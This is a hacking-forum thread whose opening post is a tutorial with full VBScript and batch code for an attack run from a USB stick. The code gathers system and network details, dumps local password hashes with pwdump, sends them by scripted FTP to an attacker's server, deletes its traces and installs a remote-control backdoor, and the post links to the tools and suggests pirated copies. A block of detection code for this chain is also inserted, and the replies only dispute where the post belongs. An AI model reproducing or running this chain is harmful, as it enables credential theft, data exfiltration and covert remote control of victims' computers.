| Author |
get all info of a windows pc in less than 1 second! and even make it that you can remote controllabl |
jelmer
Banned

Posts: 89
Location: ҉planet earth ҉
Joined: 29.06.08 Rank: God Warn Level: 100
|
|
|
Hello and welcome to my Windows lesson. I'll explain how I dump some very nice information to an FTP server.
This program will be completely autorunnable and flexible with any platform of Windows.
For this tutorial I use VBS, MS-DOS and FTP.
I am new to VBS, so please correct me if I make terrible mistakes in my scripting :).
DIM fso, TXT
Set fso = CreateObject("scblockedripting.FileSystemObject")
Set TXT = fso.CreateTextFile("hostinfo.txt", True)
I make a new text file named hostinfo.txt in the current folder.
strComputer = "."
set dicProductType = CreateObject("scblockedripting.Dictionary")
dicProductType.Add 1, "Workstation"
dicProductType.Add 2, "Domain Controller"
dicProductType.Add 3, "Standalone Server"
set objWMIDateTime = CreateObject("Wbemscblockedripting.SWbemDateTime")
set objWMI = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
set colOS = objWMI.InstancesOf("Win32_OperatingSystem")
for each objOS in colOS
TXT.WriteLine("Host Name: " & objOS.CSName)
TXT.WriteLine("OS Name: " & objOS.Caption)
next
set colCS = objWMI.InstancesOf("Win32_ComputerSystem")
for each objCS in colCS
TXT.WriteLine("Sys. Manufacturer: " & objCS.Manufacturer)
TXT.WriteLine("Sys. Model: " & objCS.Model)
TXT.WriteLine("Domain: " & objCS.Domain)
next
set colBIOS = objWMI.InstancesOf("Win32_BIOS")
for each objBIOS in colBIOS
TXT.WriteLine("BIOS Version: " & objBIOS.Version)
next
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery _
("Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True")
for each objitem in colitems
strIPAddress = Join(objitem.IPAddress, ",")
IP = stripaddress
TXT.WriteLine("Ip adress: " &ip)
next
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery _
("Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True")
For Each objItem in colItems
TXT.WriteLine("Mac-adress: " & objItem.MACAddress)
Next
I save a lot of information in the file that can be really, really useful if I want to hack it.
TXT.Write ("__________________________________________________________________________________")
Nice line to keep it neat :D
set PWDUMP = fso.CreateTextFile("hash.bat", true)
PWDUMP.Write ("pwdump -o ./hash.txt 127.0.0.1")
PWDUMP.Close
I use PWDUMP to dump the password hashes from the local machine temporarily onto my USB stick. Note: PWDUMP should be in the same folder as your VBS script for this part to work.
pwdump(start pwdump) -o(outputfile) ./hash.txt 127.0.0.1(this machine)
I made a bat file of it to simply add the arguments.
I will run the bat later in the script.
set connect = fso.CreateTextFile("connect.bat", true)
connect.WriteLine("@echo off")
connect.WriteLine("del ftpcmd.dat")
connect.WriteLine("echo @echo off>> ftpcmd.dat")
connect.WriteLine("echo user username>> ftpcmd.dat")
connect.WriteLine("echo password of the username>> ftpcmd.dat")
connect.WriteLine("echo cd httpdocs>> ftpcmd.dat")
connect.WriteLine("echo cd upload-vbs>> ftpcmd.dat")
connect.WriteLine("echo send hostinfo.txt>> ftpcmd.dat")
connect.WriteLine("echo rename hostinfo.txt>> ftpcmd.dat")
connect.WriteLine("echo 1.txt>> ftpcmd.dat")
connect.WriteLine("echo send hash.txt>> ftpcmd.dat")
connect.WriteLine("echo rename hash.txt>> ftpcmd.dat")
connect.WriteLine("echo 2.txt>> ftpcmd.dat")
connect.WriteLine("echo quit>> ftpcmd.dat")
connect.WriteLine("ftp -n -s:ftpcmd.dat justanotherhost.xxx")
connect.WriteLine("del ftpcmd.dat")
connect.WriteLine("del hash.txt")
connect.WriteLine("del hostinfo.txt")
connect.WriteLine("del hash.bat")
connect.WriteLine("lololol.bat")
connect.Close
TXT.Close
dim shell
set shell=createobject("wscblockedript.shell")
shell.run "hash.bat"
set shell=createobject("wscblockedript.shell")
shell.run "connect.bat"
set shell=nothing
set omghah = fso.CreateTextFile("lololol.bat", true)
omghah.Write ("del connect.bat")
omghah.Close
set shell=createobject("wscblockedript.shell")
shell.run "servemp_quicksetup.exe"
set shell=nothing
Here I made it make an FTP connection through a .bat file, uploaded it to the server and renamed the files to 1.txt and 2.txt.
I also deleted the files, and somehow I couldn't figure out how to delete something inside itself; it kept on giving errors if I deleted it through the VBS script (help will be appreciated if you think you've got a nice way to do this).
Then I used the tool hc, Hidden Camera is the full name of it (servemp_quicksetup.exe), to make it remote controllable. Then the only action you have to do is bash the unblock button about 2 times and you're done.
You can totally remote control the computer and you've got all the information needed to successfully hack it.
Downloads:
http://www.download3k.com/DownloadLink1-Hidden-Camera.html
The servemp_quicksetup.exe is in the add-on rar file.
http://swamp.foofus.net/fizzgig/pwdump/pwdump6-1.7.2-exe-only.zip
I will now just show how I've got it on my USB stick:
pwdump
lsremora64.dll
lsremora.dll
PwDump.exe
servpw64.exe
servpw.exe
the VBS script:
uberscript!.vbs
hidden camera
servemp_quicksetup.exe
Here I will post only the code of the VBS script:
uberscript!.vbs
DIM fso, TXT
Set fso = CreateObject("scblockedripting.FileSystemObject")
Set TXT = fso.CreateTextFile("hostinfo.txt", True)
strComputer = "."
set dicProductType = CreateObject("scblockedripting.Dictionary")
dicProductType.Add 1, "Workstation"
dicProductType.Add 2, "Domain Controller"
dicProductType.Add 3, "Standalone Server"
set objWMIDateTime = CreateObject("Wbemscblockedripting.SWbemDateTime")
set objWMI = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
set colOS = objWMI.InstancesOf("Win32_OperatingSystem")
for each objOS in colOS
TXT.WriteLine("Host Name: " & objOS.CSName)
TXT.WriteLine("OS Name: " & objOS.Caption)
next
set colCS = objWMI.InstancesOf("Win32_ComputerSystem")
for each objCS in colCS
TXT.WriteLine("Sys. Manufacturer: " & objCS.Manufacturer)
TXT.WriteLine("Sys. Model: " & objCS.Model)
TXT.WriteLine("Domain: " & objCS.Domain)
next
set colBIOS = objWMI.InstancesOf("Win32_BIOS")
for each objBIOS in colBIOS
TXT.WriteLine("BIOS Version: " & objBIOS.Version)
next
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery _
("Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True")
for each objitem in colitems
strIPAddress = Join(objitem.IPAddress, ",")
IP = stripaddress
TXT.WriteLine("Ip adress: " &ip)
next
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery _
("Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True")
For Each objItem in colItems
TXT.WriteLine("Mac-adress: " & objItem.MACAddress)
Next
TXT.Write ("__________________________________________________________________________________")
set PWDUMP = fso.CreateTextFile("hash.bat", true)
PWDUMP.Write ("pwdump -o ./hash.txt 127.0.0.1")
PWDUMP.Close
set connect = fso.CreateTextFile("connect.bat", true)
connect.WriteLine("@echo off")
connect.WriteLine("del ftpcmd.dat")
connect.WriteLine("echo @echo off>> ftpcmd.dat")
connect.WriteLine("echo user /*username of your ftp server*/>> ftpcmd.dat")
connect.WriteLine("echo /*password of your ftp server*/>> ftpcmd.dat")
connect.WriteLine("echo cd httpdocs>> ftpcmd.dat")
connect.WriteLine("echo cd upload-vbs>> ftpcmd.dat")
connect.WriteLine("echo send hostinfo.txt>> ftpcmd.dat")
connect.WriteLine("echo rename hostinfo.txt>> ftpcmd.dat")
connect.WriteLine("echo 1.txt>> ftpcmd.dat")
connect.WriteLine("echo send hash.txt>> ftpcmd.dat")
connect.WriteLine("echo rename hash.txt>> ftpcmd.dat")
connect.WriteLine("echo 2.txt>> ftpcmd.dat")
connect.WriteLine("echo quit>> ftpcmd.dat")
connect.WriteLine("ftp -n -s:ftpcmd.dat /*the ftp server you want to use, you dont have to mention ftp:// just type something like anyhost.com/*")
connect.WriteLine("del ftpcmd.dat")
connect.WriteLine("del hash.txt")
connect.WriteLine("del hostinfo.txt")
connect.WriteLine("del hash.bat")
connect.WriteLine("lololol.bat")
connect.Close
TXT.Close
dim shell
set shell=createobject("wscblockedript.shell")
shell.run "hash.bat"
set shell=createobject("wscblockedript.shell")
shell.run "connect.bat"
set shell=nothing
set omghah = fso.CreateTextFile("lololol.bat", true)
omghah.Write ("del connect.bat")
omghah.Close
set shell=createobject("wscblockedript.shell")
shell.run "servemp_quicksetup.exe"
set shell=nothing
You only have to change the username of the FTP; the password and the server should also be mentioned!
Rate and comment please if you liked it, and tell me if I have to post more details if you don't understand it.
looking for someone with neat photoshop skills to help me with the design of http://root.cd
cat /dev/sda | aplay -fdat
 |
|
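A defender's view of the chain described in the post above, as an added example that is not part of the original thread: it flags a password-dump command line and a scripted `ftp -s:` transfer that descend from a Windows script host in process-creation telemetry. The event records, field names, PIDs, paths and FTP host are constructed assumptions.

```python
import re

# Constructed process-creation records (shaped like Sysmon Event ID 1 fields);
# PIDs, paths, the .vbs name and the FTP host are made up for this example.
EVENTS = [
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe", "cmd": r'wscript.exe "E:\run.vbs"'},
    {"pid": 210, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe", "cmd": r'cmd.exe /c "E:\hash.bat"'},
    {"pid": 211, "ppid": 210, "image": r"E:\PwDump.exe", "cmd": "pwdump -o ./hash.txt 127.0.0.1"},
    {"pid": 220, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe", "cmd": r'cmd.exe /c "E:\connect.bat"'},
    {"pid": 221, "ppid": 220, "image": r"C:\Windows\System32\ftp.exe", "cmd": "ftp -n -s:ftpcmd.dat ftp.example.invalid"},
    {"pid": 300, "ppid": 100, "image": r"C:\Windows\System32\ftp.exe", "cmd": "ftp ftp.example.invalid"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
RULES = [
    ("scripted_ftp", re.compile(r"\bftp(\.exe)?\b.*\s-s:\S+", re.I)),      # ftp driven by a command file
    ("pwdump_invocation", re.compile(r"\bpwdump\S*\s.*-o\s+\S+", re.I)),  # hash dump written to a file
]

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def ancestors(event, by_pid):
    """Yield parent events up the process tree, guarding against PID loops."""
    seen, cur = set(), by_pid.get(event["ppid"])
    while cur and cur["pid"] not in seen:
        seen.add(cur["pid"])
        yield cur
        cur = by_pid.get(cur["ppid"])

def detect(events):
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        for name, rx in RULES:
            if rx.search(e["cmd"]):
                host = next((a for a in ancestors(e, by_pid)
                             if basename(a["image"]) in SCRIPT_HOSTS), None)
                findings.append({"pid": e["pid"], "rule": name, "severity": "high" if host else "medium",
                                 "script_host_pid": host["pid"] if host else None})
    return findings

def correlated_hosts(findings):
    """Script-host PIDs whose descendants both dumped hashes and ran scripted FTP."""
    seen = {}
    for f in findings:
        if f["script_host_pid"] is not None:
            seen.setdefault(f["script_host_pid"], set()).add(f["rule"])
    return sorted(p for p, rules in seen.items() if len(rules) == len(RULES))
```

An interactive `ftp` session without `-s:` (PID 300 in the sample) is deliberately not flagged; only the correlated script-host PID is worth paging on.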
| Author |
RE: qwerty |
jelmer
Banned

Posts: 89
Location: ҉planet earth ҉
Joined: 29.06.08 Rank: God Warn Level: 100
|
|
Forgot to say that you have to click manager during the Hidden Camera setup, otherwise it will only make a backdoor in your PC so that someone else can come in.
And get a pirated version if you hate to use trials.
 |
|
| Author |
RE: get all info of a windows pc in less than 1 second! and even make it that you can remote control |
spyware
Member

Posts: 3798
Location: The Netherlands
Joined: 14.04.07 Rank: God Warn Level: 50
|
|
HBH doesn't encourage posting tutorials in the forum section. Please submit this as an official article.

"The chowner of property." - Zeph
Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term. - Carl Sagan
|
|
| Author |
RE: get all info of a windows pc in less than 1 second! and even make it that you can remote control |
lostpacket
Member

Posts: 47
Location:
Joined: 12.12.06 Rank: Hacker Level 1 |
|
Then why is there a lessons section if you can't post lessons here?
Takes the piss a little really.
And to OP: compile your code and suchlike, gather the files and add it all to a rar file. Upload it.
People are more likely to test it out and tell you any errors and suchlike if they don't have to scramble around the net looking for files.
 |
|
| Author |
RE: get all info of a windows pc in less than 1 second! and even make it that you can remote control |
spyware
Member

Posts: 3798
Location: The Netherlands
Joined: 14.04.07 Rank: God Warn Level: 50
|
|
|
lostpacket wrote:
Then why is there a lessons section if you can't post lessons here?
I think the lesson section is meant for small things. The amount of code posted above could've fit better in the code-bank/article section.
However, I understand that it's a hard distinction to make for people, I guess HBH isn't really clear on this point. I still opt for an article version of the stuff posted above.

|
|
| Author |
RE: get all info of a windows pc in less than 1 second! and even make it that you can remote control |
lostpacket
Member

Posts: 47
Location:
Joined: 12.12.06 Rank: Hacker Level 1 |
|
Makes sense.
Code banks would be the best idea.

 |
|
| Author |
RE: get all info of a windows pc in less than 1 second! and even make it that you can remote control |
jelmer
Banned

Posts: 89
Location: ҉planet earth ҉
Joined: 29.06.08 Rank: God Warn Level: 100
|
|
lostpacket wrote:
Then why is there a lessons section if you can't post lessons here?
Good point if you ask me, why not post lessons here? The corner is there already.
lostpacket wrote:
And to OP: compile your code and suchlike, gather the files and add it all to a rar file. Upload it.
Didn't think this would be a good idea because the passwords are mentioned in the file, and this way you also have to build it yourself; thought that it's a nice side of the lesson.
spyware wrote:
I think the lesson section is meant for small things. The amount of code posted above could've fit better in the code-bank/article section.
Yeah, but I still think this is a good way to work people through the process of self-compiling. It's not hard or anything, but it's one step to evade script kiddie behaviour, or at least teach them a lesson, I think.
I would really not put it in a rar file or something; just ask me if you can't understand it anymore.
 |
|
| Author |
RE: get all info of a windows pc in less than 1 second! and even make it that you can remote control |
Zephyr_Pure
Member

Posts: 2402
Location:
Joined: 15.09.06 Rank: God |
|
|
lostpacket wrote:
Code banks would be the best idea.
Not necessarily... the amount of explanation accompanying the code would make it acceptable as an article, too. It's preference, but I think an article would get better and more long-lived exposure.
jelmer wrote:
Good point if you ask me, why not post lessons here? The corner is there already.
As spy said, the lessons section is for posting shorter lessons. If you have enough content for an article, post an article.
Either way, thanks for posting the content... It's just the placement that's in question.
I still check PMs from time to time.


Our responses were moronic, why shouldn't he follow suit? - Futility |
|